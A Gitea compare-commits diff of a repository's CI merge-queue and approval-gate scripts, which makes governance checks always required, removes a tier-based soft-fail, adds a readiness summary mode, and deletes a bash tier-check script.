Compare commits
43 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 1e1790c98b | |||
| 7b79b17718 | |||
| 539952054f | |||
| dca5081e73 | |||
| 4ddc93ef88 | |||
| bde3248d2d | |||
| 8cfbe77822 | |||
| 360d1f7cf7 | |||
| fcab65c794 | |||
| b9bcdfd784 | |||
| a5728204fd | |||
| fe3eaf1e79 | |||
| 118b025c70 | |||
| 28d62b1360 | |||
| 7e86f71ca1 | |||
| 6cbfcfc41e | |||
| 598520b9a4 | |||
| db435d88ff | |||
| 759f46d3df | |||
| 88a310f367 | |||
| 5c2ba22992 | |||
| 44f6ba3660 | |||
| 048a9a8d40 | |||
| c92026cb58 | |||
| 114ee8c715 | |||
| d070de7d9f | |||
| 215605e234 | |||
| eae7587a50 | |||
| 8f723c518c | |||
| 354f07604b | |||
| 4855ba400a | |||
| 99bcb9dfba | |||
| 6da3349cad | |||
| 536b51cbc8 | |||
| 43bc0ea627 | |||
| 25778e3d03 | |||
| bf8cde00f6 | |||
| 21905da5dc | |||
| cac90d09b9 | |||
| 36fae1cbf9 | |||
| 179453c4dd | |||
| c5a6df0d85 | |||
| 621d60276c |
@@ -31,7 +31,7 @@
|
||||
#
|
||||
# REQUIRED_CHECKS (legacy) is a newline-separated list used when the
|
||||
# JSON variable is not set. Declared in the workflow YAML rather than
|
||||
# fetched from /branch_protections (which needs admin scope — sop-tier-bot
|
||||
# fetched from /branch_protections (which needs admin scope —
|
||||
# has read-only). Trade dynamism for simplicity: when the required-check
|
||||
# set changes, update both branch protection AND this env. Keeping them
|
||||
# in sync is less complexity than granting the audit bot admin perms on
|
||||
|
||||
@@ -317,7 +317,33 @@ def required_checks_env(audit_doc: dict, branch: str) -> set[str]:
|
||||
f"::error::REQUIRED_CHECKS_JSON['{branch}'] is {type(branch_checks).__name__}, expected list\n"
|
||||
)
|
||||
sys.exit(3)
|
||||
return {str(item).strip() for item in branch_checks if str(item).strip()}
|
||||
# Fail-closed validation: every entry must be a non-empty string.
|
||||
# Reject null, int, dict, or empty/whitespace strings silently —
|
||||
# they indicate a malformed manifest that drift-detect must not
|
||||
# normalize away (that would hide config errors).
|
||||
validated: set[str] = set()
|
||||
for idx, item in enumerate(branch_checks):
|
||||
if not isinstance(item, str):
|
||||
sys.stderr.write(
|
||||
f"::error::REQUIRED_CHECKS_JSON['{branch}'][{idx}] is "
|
||||
f"{type(item).__name__} (value={item!r}), expected str\n"
|
||||
)
|
||||
sys.exit(3)
|
||||
stripped = item.strip()
|
||||
if not stripped:
|
||||
sys.stderr.write(
|
||||
f"::error::REQUIRED_CHECKS_JSON['{branch}'][{idx}] is "
|
||||
f"empty/whitespace string\n"
|
||||
)
|
||||
sys.exit(3)
|
||||
if stripped in validated:
|
||||
sys.stderr.write(
|
||||
f"::error::REQUIRED_CHECKS_JSON['{branch}'] contains "
|
||||
f"duplicate context '{stripped}' at index {idx}\n"
|
||||
)
|
||||
sys.exit(3)
|
||||
validated.add(stripped)
|
||||
return validated
|
||||
|
||||
# Legacy variant fallback.
|
||||
if found_legacy:
|
||||
|
||||
@@ -39,13 +39,13 @@ queue. This script provides the missing serialized policy in user space:
|
||||
|
||||
Authoritative gates (fail-closed):
|
||||
- The REQUIRED status contexts come from BRANCH PROTECTION
|
||||
(`status_check_contexts`), not a hand-maintained env list. If branch
|
||||
protection cannot be enumerated, the queue HOLDS (does not merge blindly).
|
||||
- NON-required reds (qa-review, security-review, sop-tier, sop-checklist
|
||||
when not branch-required, E2E Chat, Staging SaaS, ci-arm64-advisory, any
|
||||
(`status_check_contexts`) PLUS the hardcoded governance checks
|
||||
(qa-review, security-review, sop-checklist). If branch protection
|
||||
cannot be enumerated, the queue HOLDS (does not merge blindly).
|
||||
- NON-required reds (E2E Chat, Staging SaaS, ci-arm64-advisory, any
|
||||
continue-on-error job) MUST NOT block. They are reported, never gating.
|
||||
- `force_merge=true` is used ONLY when the merge is blocked *solely* by
|
||||
missing-but-non-required governance contexts (required are green + genuine
|
||||
missing-but-non-required advisory contexts (required are green + genuine
|
||||
approvals present). It is NEVER used to bypass a failing REQUIRED context
|
||||
or missing approvals.
|
||||
|
||||
@@ -144,6 +144,15 @@ OPT_OUT_LABELS = {
|
||||
).split(",")
|
||||
if name.strip()
|
||||
} | ({HOLD_LABEL} if HOLD_LABEL else set())
|
||||
# Governance checks that are ALWAYS required for every PR, regardless of
|
||||
# branch-protection configuration. These are the uniform-gate checks that
|
||||
# must pass before any PR can merge (SOP tier removal makes them mandatory
|
||||
# for all PRs, not just tier:medium/tier:high).
|
||||
GOVERNANCE_REQUIRED_CONTEXTS = [
|
||||
"qa-review / approved (pull_request)",
|
||||
"security-review / approved (pull_request)",
|
||||
"sop-checklist / all-items-acked (pull_request)",
|
||||
]
|
||||
REQUIRED_CONTEXTS_RAW = _env(
|
||||
"REQUIRED_CONTEXTS",
|
||||
default=(
|
||||
@@ -337,41 +346,15 @@ def latest_statuses_by_context(statuses: list[dict]) -> dict[str, dict]:
|
||||
return latest
|
||||
|
||||
|
||||
def _is_tier_low_pending_ok(
|
||||
latest_statuses: dict[str, dict],
|
||||
context: str,
|
||||
pr_labels: set[str],
|
||||
) -> bool:
|
||||
"""Return True if tier:low PR can tolerate sop-checklist pending state.
|
||||
|
||||
GENERIC PENDING-AS-GREEN REMOVED (Researcher + CR2 RC on #2368):
|
||||
The prior soft-fail accepted ANY pending sop-checklist for tier:low,
|
||||
which allowed required checks to pass without genuine verification.
|
||||
Pending required sop-checklist must now always HOLD and appear in
|
||||
missing_or_bad. This function is retained as a policy hook but
|
||||
currently always returns False so pending never counts green.
|
||||
|
||||
If a positively identifiable genuine soft-fail state is defined in
|
||||
future (e.g., a specific check-run conclusion), implement it here
|
||||
with strict positive identification — never default to pass.
|
||||
"""
|
||||
return False
|
||||
|
||||
|
||||
def required_contexts_green(
|
||||
latest_statuses: dict[str, dict],
|
||||
contexts: list[str],
|
||||
pr_labels: set[str] | None = None,
|
||||
) -> tuple[bool, list[str]]:
|
||||
missing_or_bad: list[str] = []
|
||||
for context in contexts:
|
||||
status = latest_statuses.get(context)
|
||||
state = status_state(status or {})
|
||||
if state != "success":
|
||||
if pr_labels and _is_tier_low_pending_ok(
|
||||
latest_statuses, context, pr_labels
|
||||
):
|
||||
continue # tier:low soft-fail: accept pending sop-checklist
|
||||
missing_or_bad.append(f"{context}={state or 'missing'}")
|
||||
return not missing_or_bad, missing_or_bad
|
||||
|
||||
@@ -672,13 +655,13 @@ def evaluate_merge_readiness(
|
||||
f"need {required_approvals}",
|
||||
)
|
||||
|
||||
# 4) Every BRANCH-PROTECTION-REQUIRED status context must be green. This is
|
||||
# the authoritative status gate — NON-required reds (qa-review,
|
||||
# security-review, sop-tier/sop-checklist when not BP-required, E2E Chat,
|
||||
# Staging SaaS, ci-arm64-advisory, continue-on-error jobs) are NOT
|
||||
# 4) Every REQUIRED status context must be green. This includes both
|
||||
# branch-protection-required contexts AND the hardcoded governance checks
|
||||
# (qa-review, security-review, sop-checklist). NON-required reds (E2E
|
||||
# Chat, Staging SaaS, ci-arm64-advisory, continue-on-error jobs) are NOT
|
||||
# consulted here and must not block.
|
||||
latest = latest_statuses_by_context(pr_status.get("statuses") or [])
|
||||
ok, missing_or_bad = required_contexts_green(latest, required_contexts, pr_labels)
|
||||
ok, missing_or_bad = required_contexts_green(latest, required_contexts)
|
||||
if not ok:
|
||||
return MergeDecision(False, "wait", "required contexts not green: " + ", ".join(missing_or_bad))
|
||||
|
||||
@@ -945,7 +928,9 @@ def process_once(*, dry_run: bool = False) -> int:
|
||||
f"unavailable (fail-closed): {exc}\n"
|
||||
)
|
||||
return 0
|
||||
contexts = bp.required_contexts
|
||||
# Uniform gate: governance checks are ALWAYS required, even if branch
|
||||
# protection does not enumerate them. Deduplicate against BP list.
|
||||
contexts = list(dict.fromkeys(bp.required_contexts + GOVERNANCE_REQUIRED_CONTEXTS))
|
||||
required_approvals = bp.required_approvals
|
||||
print(
|
||||
f"::notice::queue policy from branch protection: "
|
||||
@@ -1166,12 +1151,122 @@ def _evaluate_candidate(
|
||||
return decision, ctx
|
||||
|
||||
|
||||
@dataclasses.dataclass(frozen=True)
|
||||
class ReadinessEntry:
|
||||
"""One candidate's readiness state."""
|
||||
|
||||
pr_number: int
|
||||
decision: MergeDecision | None
|
||||
reason: str
|
||||
|
||||
|
||||
def enumerate_readiness(*, dry_run: bool = False) -> list[ReadinessEntry]:
|
||||
"""Evaluate ALL candidates and return their readiness states.
|
||||
|
||||
Fail-closed: if branch protection cannot be fetched, raise
|
||||
BranchProtectionUnavailable (caller must handle). Unlike
|
||||
process_once, this does NOT stop at the first actionable candidate;
|
||||
it evaluates every eligible PR and returns the full list so a
|
||||
post-batch summary can be printed.
|
||||
"""
|
||||
bp = get_branch_protection(WATCH_BRANCH)
|
||||
contexts = bp.required_contexts
|
||||
required_approvals = bp.required_approvals
|
||||
|
||||
main_sha = get_branch_head(WATCH_BRANCH)
|
||||
main_status = get_combined_status(main_sha)
|
||||
main_latest = latest_statuses_by_context(main_status.get("statuses") or [])
|
||||
main_ok, main_bad = required_contexts_green(main_latest, push_required_contexts())
|
||||
|
||||
candidates = choose_candidate_issues(
|
||||
list_candidate_issues(auto_discover=AUTO_DISCOVER),
|
||||
queue_label=QUEUE_LABEL,
|
||||
opt_out_labels=OPT_OUT_LABELS,
|
||||
auto_discover=AUTO_DISCOVER,
|
||||
)
|
||||
|
||||
entries: list[ReadinessEntry] = []
|
||||
for issue in candidates:
|
||||
pr_number = int(issue["number"])
|
||||
try:
|
||||
decision, ctx = _evaluate_candidate(
|
||||
issue,
|
||||
main_sha=main_sha,
|
||||
main_status=main_status,
|
||||
required_contexts=contexts,
|
||||
required_approvals=required_approvals,
|
||||
dry_run=dry_run,
|
||||
)
|
||||
except ApiError as exc:
|
||||
# Fail-closed per candidate: an unreadable PR is recorded as
|
||||
# unverifiable, not skipped silently.
|
||||
entries.append(
|
||||
ReadinessEntry(
|
||||
pr_number=pr_number,
|
||||
decision=None,
|
||||
reason=f"unverifiable (API error: {exc})",
|
||||
)
|
||||
)
|
||||
continue
|
||||
if decision is None:
|
||||
entries.append(
|
||||
ReadinessEntry(
|
||||
pr_number=pr_number,
|
||||
decision=None,
|
||||
reason="not merge-eligible (opt-out/draft/fork/wrong-base)",
|
||||
)
|
||||
)
|
||||
continue
|
||||
entries.append(
|
||||
ReadinessEntry(
|
||||
pr_number=pr_number,
|
||||
decision=decision,
|
||||
reason=decision.reason,
|
||||
)
|
||||
)
|
||||
return entries
|
||||
|
||||
|
||||
def print_post_batch_summary(entries: list[ReadinessEntry]) -> None:
|
||||
"""Print a structured summary of all candidates' readiness.
|
||||
|
||||
Emits ::notice:: lines for machine parsing and a human-readable
|
||||
block for operator visibility.
|
||||
"""
|
||||
ready = [e for e in entries if e.decision and e.decision.ready]
|
||||
waiting = [e for e in entries if e.decision and not e.decision.ready]
|
||||
ineligible = [e for e in entries if e.decision is None]
|
||||
|
||||
print("::group::merge-queue readiness summary")
|
||||
print(f"total_candidates={len(entries)}")
|
||||
print(f"ready={len(ready)}")
|
||||
print(f"waiting={len(waiting)}")
|
||||
print(f"ineligible/unverifiable={len(ineligible)}")
|
||||
print("")
|
||||
for e in entries:
|
||||
state = "ready" if e.decision and e.decision.ready else (
|
||||
"waiting" if e.decision else "ineligible"
|
||||
)
|
||||
action = e.decision.action if e.decision else "n/a"
|
||||
print(f"PR #{e.pr_number}: state={state} action={action} reason={e.reason}")
|
||||
print("::endgroup::")
|
||||
|
||||
|
||||
def main() -> int:
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("--dry-run", action="store_true")
|
||||
parser.add_argument(
|
||||
"--enumerate",
|
||||
action="store_true",
|
||||
help="Evaluate all candidates and print a readiness summary without merging.",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
_require_runtime_env()
|
||||
try:
|
||||
if args.enumerate:
|
||||
entries = enumerate_readiness(dry_run=args.dry_run)
|
||||
print_post_batch_summary(entries)
|
||||
return 0
|
||||
return process_once(dry_run=args.dry_run)
|
||||
except ApiError as exc:
|
||||
# FAIL-CLOSED: API errors are not "transient success" — they mean
|
||||
|
||||
@@ -165,7 +165,7 @@ def api(
|
||||
# Format: "<workflow_name> / <job_name_or_key> (<event>)"
|
||||
# Examples observed on molecule-core/main:
|
||||
# "Secret scan / Scan diff for credential-shaped strings (pull_request)"
|
||||
# "sop-tier-check / tier-check (pull_request)"
|
||||
# " / tier-check (pull_request)"
|
||||
#
|
||||
# Split strategy: peel off the trailing ` (<event>)` first, then split
|
||||
# the leading `<workflow> / <rest>` on the FIRST ` / ` (workflow names
|
||||
|
||||
@@ -17,7 +17,7 @@ Rules (4 fatal + 1 fatal cross-file + 1 heuristic-warn):
|
||||
enumeration; task #81). Workflow registers, fires for 0 events.
|
||||
3. `name:` containing `/` — breaks the
|
||||
`<workflow> / <job> (<event>)` commit-status context convention;
|
||||
downstream parsers (sop-tier-check, status-reaper) tokenize on `/`.
|
||||
downstream parsers (sop-checklist, status-reaper) tokenize on `/`.
|
||||
4. `name:` collision across files — Gitea routes commit-status updates
|
||||
by `name` and behavior on collision is undefined (status-reaper
|
||||
rev1 fail-loud).
|
||||
@@ -150,7 +150,7 @@ def check_name_with_slash(filename: str, doc: Any) -> list[str]:
|
||||
f"::error file={filename}::Rule 3 (FATAL): workflow `name: "
|
||||
f"{name!r}` contains `/`. The commit-status context convention "
|
||||
f"is `<workflow> / <job> (<event>)`; embedding `/` in the "
|
||||
f"workflow name makes downstream parsers (sop-tier-check, "
|
||||
f"workflow name makes downstream parsers (sop-checklist, "
|
||||
f"status-reaper) tokenize ambiguously. Rename to use `-` or "
|
||||
f"` ` instead."
|
||||
)
|
||||
|
||||
@@ -49,8 +49,7 @@ Daily scheduled run + workflow_dispatch:
|
||||
4. If orphans exist:
|
||||
- File or PATCH a `[ci-bp-drift]` issue (idempotency contract:
|
||||
search for exact title prefix, edit existing if open).
|
||||
- Apply labels `tier:high` + `ci-bp-drift` (lookup IDs per
|
||||
repo; per `feedback_tier_label_ids_are_per_repo`).
|
||||
- Apply label `ci-bp-drift` (lookup ID per repo).
|
||||
- Exit 1.
|
||||
|
||||
5. If no orphans:
|
||||
@@ -82,7 +81,7 @@ Memory cross-links
|
||||
------------------
|
||||
- internal#350 (the RFC that specs this lint)
|
||||
- feedback_phantom_required_check_after_gitea_migration
|
||||
- feedback_tier_label_ids_are_per_repo
|
||||
- feedback_label_ids_are_per_repo
|
||||
- reference_post_suspension_pipeline
|
||||
"""
|
||||
from __future__ import annotations
|
||||
@@ -359,7 +358,7 @@ def file_or_update_issue(
|
||||
existing = h
|
||||
break
|
||||
|
||||
label_ids = _ensure_labels(repo, ["ci-bp-drift", "tier:high"])
|
||||
label_ids = _ensure_labels(repo, ["ci-bp-drift"])
|
||||
|
||||
if existing:
|
||||
api(
|
||||
|
||||
@@ -50,7 +50,7 @@ runtime contract enforcement lives in `_require_runtime_env()`.
|
||||
|
||||
Run locally (dry-run, no API mutation):
|
||||
GITEA_TOKEN=... GITEA_HOST=git.moleculesai.app REPO=owner/repo \\
|
||||
WATCH_BRANCH=main RED_LABEL=tier:high \\
|
||||
WATCH_BRANCH=main RED_LABEL=ci-bp-drift \\
|
||||
python3 .gitea/scripts/main-red-watchdog.py --dry-run
|
||||
"""
|
||||
from __future__ import annotations
|
||||
@@ -81,7 +81,7 @@ GITEA_TOKEN = _env("GITEA_TOKEN")
|
||||
GITEA_HOST = _env("GITEA_HOST")
|
||||
REPO = _env("REPO")
|
||||
WATCH_BRANCH = _env("WATCH_BRANCH", default="main")
|
||||
RED_LABEL = _env("RED_LABEL", default="tier:high")
|
||||
RED_LABEL = _env("RED_LABEL", default="ci-bp-drift")
|
||||
|
||||
OWNER, NAME = (REPO.split("/", 1) + [""])[:2] if REPO else ("", "")
|
||||
API = f"https://{GITEA_HOST}/api/v1" if GITEA_HOST else ""
|
||||
|
||||
@@ -11,7 +11,7 @@
|
||||
#
|
||||
# Flow:
|
||||
# 1. Load .gitea/sop-checklist-config.yaml (from BASE ref — trusted).
|
||||
# 2. GET /repos/{R}/pulls/{N} — author, head.sha, tier label
|
||||
# 2. GET /repos/{R}/pulls/{N} — author, head.sha, labels
|
||||
# 3. GET /repos/{R}/issues/{N}/comments — extract /sop-ack and /sop-revoke
|
||||
# 4. For each checklist item:
|
||||
# a. Is the section marker present in PR body? (author answered)
|
||||
@@ -665,8 +665,8 @@ def load_config(path: str) -> dict[str, Any]:
|
||||
def _load_config_minimal(path: str) -> dict[str, Any]:
|
||||
"""Minimal YAML subset parser for our config shape.
|
||||
|
||||
Supports: top-level scalar:value, top-level map-of-map (e.g.
|
||||
tier_failure_mode), top-level list of maps (items:), and within an
|
||||
Supports: top-level scalar:value, top-level map-of-map,
|
||||
top-level list of maps (items:), and within an
|
||||
item map: scalars + lists of scalars. Does NOT support nested lists,
|
||||
YAML anchors, multi-doc, or flow style.
|
||||
"""
|
||||
@@ -835,8 +835,7 @@ def render_status(
|
||||
|
||||
state is "success" if every item has at least one valid ack
|
||||
(body section presence is informational only — peer-ack is the
|
||||
real gate). tier:low PRs receive state="success" (soft-fail — no
|
||||
acks required); the description carries "[info tier:low]" prefix.
|
||||
real gate).
|
||||
"""
|
||||
n = len(items)
|
||||
fully_acked = [
|
||||
@@ -863,35 +862,16 @@ def render_status(
|
||||
return state, " — ".join(desc_parts)
|
||||
|
||||
|
||||
def get_tier_mode(pr: dict[str, Any], cfg: dict[str, Any]) -> str:
|
||||
"""Read tier label, return 'hard' or 'soft' per cfg.tier_failure_mode."""
|
||||
labels = pr.get("labels") or []
|
||||
tier_labels = [label.get("name", "") for label in labels if (label.get("name", "") or "").startswith("tier:")]
|
||||
mode_map = cfg.get("tier_failure_mode") or {}
|
||||
default_mode = cfg.get("default_mode", "hard")
|
||||
for tl in tier_labels:
|
||||
if tl in mode_map:
|
||||
return mode_map[tl]
|
||||
return default_mode
|
||||
|
||||
|
||||
def is_high_risk(pr: dict[str, Any], cfg: dict[str, Any]) -> bool:
|
||||
"""Return True when the PR is high-risk per RFC#450 Option C.
|
||||
|
||||
A PR is high-risk when ANY of:
|
||||
- it carries the `tier:high` label (mechanically strictest tier), or
|
||||
- it carries any label listed in cfg.high_risk_labels.
|
||||
A PR is high-risk when it carries any label listed in cfg.high_risk_labels.
|
||||
|
||||
High-risk PRs use `required_teams_high_risk` (when set on an item)
|
||||
instead of the default `required_teams`. Items without
|
||||
`required_teams_high_risk` are unaffected (the default applies).
|
||||
|
||||
Governance fix for internal#442 — closes the inconsistency between
|
||||
sop-tier-check (tier-aware) and sop-checklist (was tier-blind).
|
||||
"""
|
||||
label_set = {(label.get("name") or "") for label in (pr.get("labels") or [])}
|
||||
if "tier:high" in label_set:
|
||||
return True
|
||||
high_risk_labels = set(cfg.get("high_risk_labels") or [])
|
||||
return bool(label_set & high_risk_labels)
|
||||
|
||||
@@ -1169,13 +1149,6 @@ def main(argv: list[str] | None = None) -> int:
|
||||
body_state = {it["slug"]: section_marker_present(body, it["pr_section_marker"]) for it in items}
|
||||
|
||||
state, description = render_status(items, ack_state, body_state)
|
||||
mode = get_tier_mode(pr, cfg)
|
||||
if mode == "soft":
|
||||
# tier:low: acks are informational only — post success so BP gate passes.
|
||||
# Description carries "[info tier:low]" prefix so reviewers know acks
|
||||
# were not required (vs a tier:medium+ PR that truly passed all acks).
|
||||
state = "success"
|
||||
description = f"[info tier:low] {description}"
|
||||
if volume_skipped:
|
||||
# Above the comment-cap — we may have a partial view. Soft-pend
|
||||
# so neither BP nor the author gets stuck; surface the cap so
|
||||
@@ -1189,7 +1162,7 @@ def main(argv: list[str] | None = None) -> int:
|
||||
# Diagnostics to job log.
|
||||
print(
|
||||
f"::notice::PR #{args.pr} author={author} head={head_sha[:7]} "
|
||||
f"mode={mode} risk_class={'high' if high_risk else 'default'}"
|
||||
f"risk_class={'high' if high_risk else 'default'}"
|
||||
)
|
||||
for it in items:
|
||||
slug = it["slug"]
|
||||
|
||||
@@ -1,423 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# sop-tier-check — verify a Gitea PR satisfies the §SOP-6 approval gate.
|
||||
#
|
||||
# Reads the PR's tier label, walks approving reviewers, and checks team
|
||||
# membership against the tier's approval expression. Passes only when
|
||||
# ALL clauses in the expression are satisfied by the set of approving
|
||||
# reviewers (AND-composition; internal#189).
|
||||
#
|
||||
# Expression syntax:
|
||||
# "team-a" — OR-set: any ONE of the comma-separated teams
|
||||
# "team-a AND team-b" — AND: BOTH must each have ≥1 approver
|
||||
# "(a,b,c)" — OR-set wrapped in parens; same as "a,b,c"
|
||||
#
|
||||
# Example: "qa AND security AND (managers,ceo)" means:
|
||||
# ≥1 approver in team "qa" AND
|
||||
# ≥1 approver in team "security" AND
|
||||
# ≥1 approver in team "managers" OR "ceo"
|
||||
#
|
||||
# Per the spec (internal#189), the hard gate here pairs with the
|
||||
# advisory gate of sop-conformance LLM-judge (internal#188): each
|
||||
# required-team click must reflect real verification (visible in review
|
||||
# body or A2A messages), not rubber-stamp APPROVE. Both gates together
|
||||
# close the "teammate clicks APPROVE without verifying" gap.
|
||||
#
|
||||
# Invoked from `.gitea/workflows/sop-tier-check.yml`. The workflow sets
|
||||
# the env vars below; this script does no IO outside of stdout/stderr +
|
||||
# the Gitea API.
|
||||
#
|
||||
# Required env:
|
||||
# GITEA_TOKEN — bot PAT with read:organization,read:user,
|
||||
# read:issue,read:repository scopes
|
||||
# GITEA_HOST — e.g. git.moleculesai.app
|
||||
# REPO — owner/name (from github.repository)
|
||||
# PR_NUMBER — int (from github.event.pull_request.number)
|
||||
# PR_AUTHOR — login (from github.event.pull_request.user.login)
|
||||
#
|
||||
# Optional:
|
||||
# SOP_DEBUG=1 — print per-API-call diagnostic lines. Default: off.
|
||||
# SOP_LEGACY_CHECK=1 — revert to OR-gate (≥1 approver from any eligible
|
||||
# team). Grace window for PRs in-flight when the
|
||||
# new AND-composition was deployed. Expires 2026-05-17
|
||||
# (7-day burn-in window; internal#189 Phase 1).
|
||||
# Set by workflow for PRs merged before the deploy.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# Ensure jq is available. Runners may not have it pre-installed, and the
|
||||
# workflow-level jq install can fail on runners with network restrictions
|
||||
# (GitHub releases not reachable from some runner networks — infra#241
|
||||
# follow-up). This fallback is idempotent — no-op when jq is already on PATH.
|
||||
if ! command -v jq >/dev/null 2>&1; then
|
||||
echo "::notice::jq not found on PATH — attempting install..."
|
||||
_jq_installed="no"
|
||||
# apt-get first (primary) — Ubuntu package mirrors are reliably reachable.
|
||||
if apt-get update -qq && apt-get install -y -qq jq 2>/dev/null; then
|
||||
echo "::notice::jq installed via apt-get: $(jq --version)"
|
||||
_jq_installed="yes"
|
||||
# GitHub binary as secondary fallback — may fail on restricted networks.
|
||||
elif timeout 120 curl -sSL \
|
||||
"https://github.com/jqlang/jq/releases/download/jq-1.7.1/jq-linux-amd64" \
|
||||
-o /usr/local/bin/jq \
|
||||
&& chmod +x /usr/local/bin/jq; then
|
||||
echo "::notice::jq binary downloaded: $(/usr/local/bin/jq --version)"
|
||||
_jq_installed="yes"
|
||||
fi
|
||||
if ! command -v jq >/dev/null 2>&1; then
|
||||
echo "::error::jq installation failed — apt-get and GitHub binary both failed."
|
||||
echo "::error::sop-tier-check requires jq for all JSON API parsing."
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
|
||||
debug() {
|
||||
if [ "${SOP_DEBUG:-}" = "1" ]; then
|
||||
echo " [debug] $*" >&2
|
||||
fi
|
||||
}
|
||||
|
||||
# Validate env
|
||||
: "${GITEA_TOKEN:?GITEA_TOKEN required}"
|
||||
: "${GITEA_HOST:?GITEA_HOST required}"
|
||||
: "${REPO:?REPO required (owner/name)}"
|
||||
: "${PR_NUMBER:?PR_NUMBER required}"
|
||||
: "${PR_AUTHOR:?PR_AUTHOR required}"
|
||||
|
||||
OWNER="${REPO%%/*}"
|
||||
NAME="${REPO##*/}"
|
||||
API="https://${GITEA_HOST}/api/v1"
|
||||
AUTH="Authorization: token ${GITEA_TOKEN}"
|
||||
echo "::notice::tier-check start: repo=$OWNER/$NAME pr=$PR_NUMBER author=$PR_AUTHOR"
|
||||
|
||||
# Sanity: token resolves to a user.
|
||||
# Use || true on the jq pipeline so that set -euo pipefail (line 45) does not
|
||||
# cause the script to exit prematurely when the token is empty/invalid — the
|
||||
# if check below handles that case gracefully. Without || true, a 401 from an
|
||||
# empty/invalid token causes jq to exit 1, triggering set -e and exiting the
|
||||
# entire script before the error can be logged.
|
||||
WHOAMI=$(curl -sS -H "$AUTH" "${API}/user" | jq -r '.login // ""') || true
|
||||
if [ -z "$WHOAMI" ]; then
|
||||
echo "::error::GITEA_TOKEN cannot resolve a user via /api/v1/user — check the token scope and that the secret is wired correctly."
|
||||
exit 1
|
||||
fi
|
||||
echo "::notice::token resolves to user: $WHOAMI"
|
||||
|
||||
# 0.5 Read PR head SHA so we can reject stale approvals after head moves
|
||||
# (internal#816). Reviews carry the commit_id they were submitted against.
|
||||
HEAD_SHA=$(curl -sS -H "$AUTH" "${API}/repos/${OWNER}/${NAME}/pulls/${PR_NUMBER}" | jq -r '.head.sha // ""') || true
|
||||
if [ -z "$HEAD_SHA" ]; then
|
||||
echo "::error::Failed to fetch PR head SHA — token may be invalid."
|
||||
exit 1
|
||||
fi
|
||||
debug "pr-head-sha=$HEAD_SHA"
|
||||
|
||||
# 1. Read tier label. || true ensures set -euo pipefail does not abort the
|
||||
# script if curl or jq fails (e.g. 401 from empty token).
|
||||
LABELS=$(curl -sS -H "$AUTH" "${API}/repos/${OWNER}/${NAME}/issues/${PR_NUMBER}/labels" | jq -r '.[].name') || true
|
||||
TIER=""
|
||||
for L in $LABELS; do
|
||||
case "$L" in
|
||||
tier:low|tier:medium|tier:high)
|
||||
if [ -n "$TIER" ]; then
|
||||
echo "::error::Multiple tier labels: $TIER + $L. Apply exactly one."
|
||||
exit 1
|
||||
fi
|
||||
TIER="$L"
|
||||
;;
|
||||
esac
|
||||
done
|
||||
if [ -z "$TIER" ]; then
|
||||
echo "::error::PR has no tier:low|tier:medium|tier:high label. Apply one before merge."
|
||||
exit 1
|
||||
fi
|
||||
debug "tier=$TIER"
|
||||
|
||||
# 2. Tier → required team expression (AND-composition; internal#189)
|
||||
#
|
||||
# Expression syntax:
|
||||
# clause-a AND clause-b AND ... — ALL clauses must pass
|
||||
# team-a,team-b,team-c — OR-set: ≥1 approver in ANY of these teams
|
||||
# (team-a,team-b) — same as team-a,team-b (parens optional)
|
||||
#
|
||||
# This map is the single source of truth. Update it when the team structure
|
||||
# or policy changes. Teams referenced here but absent in Gitea are treated
|
||||
# as unachievable (would always fail) — operators notice the clear error
|
||||
# and create the missing team.
|
||||
#
|
||||
# Current Gitea teams: ceo, engineers, managers, qa, security
|
||||
declare -A TIER_EXPR=(
|
||||
# tier:low — same as previous OR gate: any engineer, manager, or ceo.
|
||||
["tier:low"]="engineers,managers,ceo"
|
||||
|
||||
# tier:medium — AND of (managers) AND (engineers) AND (qa,security)
|
||||
# ≥1 approver from managers AND ≥1 from engineers AND ≥1 from qa OR security.
|
||||
["tier:medium"]="managers AND engineers AND qa,security"
|
||||
|
||||
# tier:high — ceo only. The AND-composition adds no value for a
|
||||
# single-team gate, but the framework is wired for consistency.
|
||||
["tier:high"]="ceo"
|
||||
)
|
||||
|
||||
EXPR="${TIER_EXPR[$TIER]-}"
|
||||
if [ -z "$EXPR" ]; then
|
||||
echo "::error::No expression defined for tier $TIER in TIER_EXPR map."
|
||||
exit 1
|
||||
fi
|
||||
debug "expression=$EXPR"
|
||||
|
||||
# 3. Legacy OR-gate override (7-day burn-in grace window; internal#189 Phase 1)
|
||||
if [ "${SOP_LEGACY_CHECK:-}" = "1" ]; then
|
||||
LEGACY_ELIGIBLE=""
|
||||
case "$TIER" in
|
||||
tier:low) LEGACY_ELIGIBLE="engineers managers ceo" ;;
|
||||
tier:medium) LEGACY_ELIGIBLE="managers ceo" ;;
|
||||
tier:high) LEGACY_ELIGIBLE="ceo" ;;
|
||||
esac
|
||||
echo "::notice::SOP_LEGACY_CHECK=1 — using OR-gate ({$LEGACY_ELIGIBLE}) for this PR."
|
||||
ELIGIBLE="$LEGACY_ELIGIBLE"
|
||||
fi
|
||||
|
||||
# 4. Resolve all team names → IDs
|
||||
# /orgs/{org}/teams/{slug}/... endpoints don't exist on Gitea 1.22;
|
||||
# we use /teams/{id}.
|
||||
# set +e prevents set -e from aborting the script if curl fails (e.g. empty token).
|
||||
ORG_TEAMS_FILE=$(mktemp)
|
||||
trap 'rm -f "$ORG_TEAMS_FILE"' EXIT
|
||||
set +e
|
||||
HTTP_CODE=$(curl -sS -o "$ORG_TEAMS_FILE" -w '%{http_code}' -H "$AUTH" \
|
||||
"${API}/orgs/${OWNER}/teams")
|
||||
_HTTP_EXIT=$?
|
||||
set -e
|
||||
debug "teams-list HTTP=$HTTP_CODE (curl exit=$_HTTP_EXIT) size=$(wc -c <"$ORG_TEAMS_FILE")"
|
||||
if [ "${SOP_DEBUG:-}" = "1" ]; then
|
||||
echo " [debug] teams-list body (first 300 chars):" >&2
|
||||
head -c 300 "$ORG_TEAMS_FILE" >&2; echo >&2
|
||||
fi
|
||||
if [ "$_HTTP_EXIT" -ne 0 ] || [ "$HTTP_CODE" != "200" ]; then
|
||||
echo "::error::GET /orgs/${OWNER}/teams failed (curl exit=$_HTTP_EXIT HTTP=$HTTP_CODE) — token may lack read:org scope or be invalid."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Collect every team name that appears in the expression.
|
||||
